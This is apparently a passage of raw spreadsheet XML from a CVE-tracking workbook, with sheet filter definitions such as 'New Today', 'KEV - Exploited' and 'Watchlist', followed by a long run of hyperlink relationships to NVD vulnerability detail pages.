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CVEs'!$A$1:$T$867</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="2" hidden="1">'New Today'!$A$1:$T$742</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="3" hidden="1">'Significant Updates'!$A$1:$T$126</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="4" hidden="1">'Added to KEV'!$A$1:$T$1</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="5" hidden="1">'KEV - Exploited'!$A$1:$T$2</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="6" hidden="1">'Critical &amp; High'!$A$1:$T$418</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="7" hidden="1">'Watchlist'!$A$1:$T$384</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="8" hidden="1">'Packages (GHSA-OSV)'!$A$1:$T$134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76504" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102427" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55107" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76570" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96349" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100512" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102115" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18782" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55494" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82307" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88920" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96350" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97248" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97274" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102149" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102489" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102490" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14157" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55181" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93903" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102147" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102455" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102458" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103395" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103470" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103475" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74864" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76142" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82824" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82825" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82827" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82829" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96822" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101276" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101283" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102508" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102992" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103547" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19445" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74865" TargetMode="External" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102095" TargetMode="External" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102102" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102103" TargetMode="External" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102104" TargetMode="External" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102105" TargetMode="External" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102106" TargetMode="External" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62308" TargetMode="External" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75969" TargetMode="External" Id="rId48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77185" TargetMode="External" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87830" TargetMode="External" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89238" TargetMode="External" Id="rId51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92966" TargetMode="External" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94052" TargetMode="External" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94053" TargetMode="External" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97196" TargetMode="External" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55176" TargetMode="External" Id="rId56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94389" TargetMode="External" Id="rId57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100277" TargetMode="External" Id="rId58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13313" TargetMode="External" Id="rId59" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100253" TargetMode="External" Id="rId60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100254" TargetMode="External" Id="rId61" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101880" TargetMode="External" Id="rId62" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101882" TargetMode="External" Id="rId63" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102120" TargetMode="External" Id="rId64" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102125" TargetMode="External" Id="rId65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102377" TargetMode="External" Id="rId66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103474" TargetMode="External" Id="rId67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18783" TargetMode="External" Id="rId68" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80275" TargetMode="External" Id="rId69" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94076" TargetMode="External" Id="rId70" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94121" TargetMode="External" Id="rId71" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94678" TargetMode="External" Id="rId72" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94683" TargetMode="External" Id="rId73" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95531" TargetMode="External" Id="rId74" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96831" TargetMode="External" Id="rId75" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96837" TargetMode="External" Id="rId76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96838" TargetMode="External" Id="rId77" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97291" TargetMode="External" Id="rId78" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102092" TargetMode="External" Id="rId79" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102100" TargetMode="External" Id="rId80" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102509" TargetMode="External" Id="rId81" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102510" TargetMode="External" Id="rId82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102993" TargetMode="External" Id="rId83" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102994" TargetMode="External" Id="rId84" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102995" TargetMode="External" Id="rId85" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102996" TargetMode="External" Id="rId86" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102997" TargetMode="External" Id="rId87" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102998" TargetMode="External" Id="rId88" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102999" TargetMode="External" Id="rId89" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103000" TargetMode="External" Id="rId90" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103235" TargetMode="External" Id="rId91" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103270" TargetMode="External" Id="rId92" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103471" TargetMode="External" Id="rId93" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-10764" TargetMode="External" Id="rId94" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47097" TargetMode="External" Id="rId95" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55094" TargetMode="External" Id="rId96" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55224" TargetMode="External" Id="rId97" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76992" TargetMode="External" Id="rId98" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82826" TargetMode="External" Id="rId99" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82828" TargetMode="External" Id="rId100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92867" TargetMode="External" Id="rId101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92870" TargetMode="External" Id="rId102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92871" TargetMode="External" Id="rId103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102121" TargetMode="External" Id="rId104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102454" TargetMode="External" Id="rId105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103239" TargetMode="External" Id="rId106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103398" TargetMode="External" Id="rId107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97150" TargetMode="External" Id="rId108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102511" TargetMode="External" Id="rId109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-10739" TargetMode="External" Id="rId110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94115" TargetMode="External" Id="rId111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94177" TargetMode="External" Id="rId112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97287" TargetMode="External" Id="rId113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97293" TargetMode="External" Id="rId114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76146" TargetMode="External" Id="rId115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103237" TargetMode="External" Id="rId116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103321" TargetMode="External" Id="rId117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46711" TargetMode="External" Id="rId118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100273" TargetMode="External" Id="rId119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102984" TargetMode="External" Id="rId120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102990" TargetMode="External" Id="rId121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93621" TargetMode="External" Id="rId122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96817" TargetMode="External" Id="rId123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100255" TargetMode="External" Id="rId124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102101" TargetMode="External" Id="rId125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102126" TargetMode="External" Id="rId126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103432" TargetMode="External" Id="rId127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103473" TargetMode="External" Id="rId128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51568" TargetMode="External" Id="rId129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51570" TargetMode="External" Id="rId130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87004" TargetMode="External" Id="rId131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93994" TargetMode="External" Id="rId132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100256" TargetMode="External" Id="rId133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101885" TargetMode="External" Id="rId134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102112" TargetMode="External" Id="rId135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102113" TargetMode="External" Id="rId136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102118" TargetMode="External" Id="rId137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47489" TargetMode="External" Id="rId138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47491" TargetMode="External" Id="rId139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47493" TargetMode="External" Id="rId140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47494" TargetMode="External" Id="rId141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47495" TargetMode="External" Id="rId142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47497" TargetMode="External" Id="rId143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47498" TargetMode="External" Id="rId144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47499" TargetMode="External" Id="rId145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47500" TargetMode="External" Id="rId146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47501" TargetMode="External" Id="rId147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47502" TargetMode="External" Id="rId148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47503" TargetMode="External" Id="rId149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47504" TargetMode="External" Id="rId150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47505" TargetMode="External" Id="rId151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47507" TargetMode="External" Id="rId152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47508" TargetMode="External" Id="rId153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47510" TargetMode="External" Id="rId154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47511" TargetMode="External" Id="rId155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47512" TargetMode="External" Id="rId156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47513" TargetMode="External" Id="rId157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47514" TargetMode="External" Id="rId158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47516" TargetMode="External" Id="rId159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47519" TargetMode="External" Id="rId160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47520" TargetMode="External" Id="rId161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47521" TargetMode="External" Id="rId162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 